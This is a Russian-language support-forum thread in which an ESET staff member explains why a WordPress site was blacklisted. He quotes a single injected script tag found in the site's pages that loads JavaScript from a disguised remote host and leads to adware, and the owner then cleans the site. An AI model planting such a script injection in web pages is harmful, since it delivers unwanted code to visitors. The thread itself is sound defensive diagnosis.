Сайт в blacklist - Форум технической поддержки ESET NOD32

Сообщений: 18

Баллов: 9

Регистрация: 11.10.2019

Размещено 11.10.2019 14:59:19

Добрый день! По непонятным мне причинам Eset на части сайта https://madbadjack.com, которая под управлением wordpress, обнаружила "зловреда". Причем определяет его только Эсет. Проверки проводил на virustotal, Quttera, Онлайн проверка URL Dr. Web, Касерского и еще с пяток сервисов. Затем внутренними сканерами wordpress провел диагностику, тоже нет проблем. Вчера ошибку выдавал EIS, но блокировки не было. Сегодня сайт и вовсе попал в BL. Прошу разобраться в ситуации. Спасибо.
P.S. просканировал скачанную файловую систему - вирусов не обнаружено. Скрин прилагаю.

Прикрепленные файлы

eset_online_scan.jpg (68.58 КБ)

Изменено: Максим Голубков - 12.10.2019 01:22:54

Сообщений: 12962

Баллов: 10371

Регистрация: 16.03.2010

Размещено 12.10.2019 09:40:28

Цитата
Максим Голубков написал: P.S. просканировал скачанную файловую систему - вирусов не обнаружено.

Доброго,

В коде сайта есть вставки которые ведут на адварь.
Пример
https://madbadjack.com/kaspersky-safe-kids-po-rezultatam-testa/

Внутри страницы вставка

Код
<p><script src="//s3.ama_zonaws.com/jscript-lo_ad/217bc9f0d28b2da070.js"></script></p>

Полагаете она там нужна? Я вот нет.
https://www.virustotal.com/gui/file/0e258a7d9b6fd65161f54a82fb32a0cb5665d2be18a4e9869e34ab436e91c09b/detection

Дальше искать не стал, удаляем, чистим сайт, пишем запрос в антивирусную лабораторию. Пример запроса в правилах раздела.

Сообщений: 18

Баллов: 9

Регистрация: 11.10.2019

Размещено 12.10.2019 11:25:38

Спасибо. Это значит из БД идет.

Сообщений: 18

Баллов: 9

Регистрация: 11.10.2019

Размещено 12.10.2019 16:03:07

Большое спасибо, Дмитрий! Вопрос решен.

[ Закрыто ] Сайт в blacklist , madbadjack.com попал в blacklist по подозрению в malware